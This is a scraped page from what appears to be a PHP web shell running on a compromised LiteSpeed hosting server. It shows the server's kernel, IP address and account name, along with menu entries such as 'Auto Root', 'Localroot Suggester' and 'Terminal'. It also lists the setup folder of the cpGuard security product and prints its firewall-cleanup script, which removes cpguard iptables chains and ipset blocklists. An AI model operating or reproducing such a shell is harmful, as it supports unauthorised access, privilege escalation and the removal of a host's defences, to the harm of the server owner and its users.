Linux sh52.ich-4.com 5.14.0-611.26.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Thu Jan 29 05:24:47 EST 2026 x86_64
LiteSpeed
Server IP : 198.143.147.58 & Your IP : 216.73.217.21
Domains :
Cant Read [ /etc/named.conf ]
User : actualbuzz
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
opt /
cpguard /
app /
setup /
Delete
Unzip
Name
Size
Permission
Date
Action
common
[ DIR ]
drwxr-xr-x
2026-05-05 12:21
cpguard
[ DIR ]
drwxr-xr-x
2026-05-08 04:29
scripts
[ DIR ]
drwxr-xr-x
2026-04-13 13:19
clear_ipdb.sh
1.56
KB
-rw-r--r--
2025-08-29 17:27
cpguard.ini
3.7
KB
-rw-r--r--
2023-09-23 04:49
cpguard_update_script.php
4.33
KB
-rw-r--r--
2026-05-07 09:47
definitions_update.php
12.6
KB
-rw-r--r--
2025-10-21 13:17
install.php
9.77
KB
-rw-r--r--
2025-06-12 08:14
panel_update_script.php
9.05
KB
-rw-r--r--
2026-02-03 06:30
software_update.php
21.66
KB
-rw-r--r--
2026-01-22 07:15
standalone.php
31.4
KB
-rw-r--r--
2024-11-08 06:51
summary.php
11.82
KB
-rw-r--r--
2025-11-18 10:31
swversion
5
B
-rw-r--r--
2026-05-08 06:16
uninstall.php
2.74
KB
-rw-r--r--
2025-07-01 13:31
Save
Rename
#!/usr/bin/env bash # Minimal one-time cleanup of legacy iptables/ipset entries before nftables # - Detect full paths for iptables and ipset # - Verify binaries with --version (if unsupported, still proceed) # - Ignore errors for missing chains/sets; continue regardless set +e IPTABLES=$(command -v iptables || true) IPSET=$(command -v ipset || true) # Verify binaries (unset if unusable) if [ -n "$IPTABLES" ]; then "$IPTABLES" --version >/dev/null 2>&1 || IPTABLES="" fi if [ -n "$IPSET" ]; then "$IPSET" --version >/dev/null 2>&1 || IPSET="" fi # Safe wrappers: run only if binary is available; suppress errors ipt() { [ -n "$IPTABLES" ] && "$IPTABLES" "$@" 2>/dev/null || true; } ips() { [ -n "$IPSET" ] && "$IPSET" "$@" 2>/dev/null || true; } # blocklist-cpguard chain ipt -D INPUT -j blocklist-cpguard ipt --flush blocklist-cpguard ipt -X blocklist-cpguard # ipset sets (best-effort destroy) ips destroy whitelist-cpguard ips destroy blocklist-cpguard ips destroy cc-blocklist-cpguard # dos-cpguard chain ipt -D INPUT -j dos-cpguard ipt --flush dos-cpguard ipt -X dos-cpguard # Removes any /usr/bin/cpgcli lines from /etc/csf/csfpost.sh CSFPOST="/etc/csf/csfpost.sh" # Exit silently if file does not exist [ ! -f "$CSFPOST" ] && exit 0 # Remove lines containing /usr/bin/cpgcli # -i.bak keeps a backup copy as csfpost.sh.bak (optional safety) sed -i.bak '/\/usr\/bin\/cpgcli/d' "$CSFPOST" # If file is now empty or only contains the shebang, delete it if [ ! -s "$CSFPOST" ] || grep -qx '#!/bin/bash' "$CSFPOST"; then rm -f "$CSFPOST" else chmod 755 "$CSFPOST" fi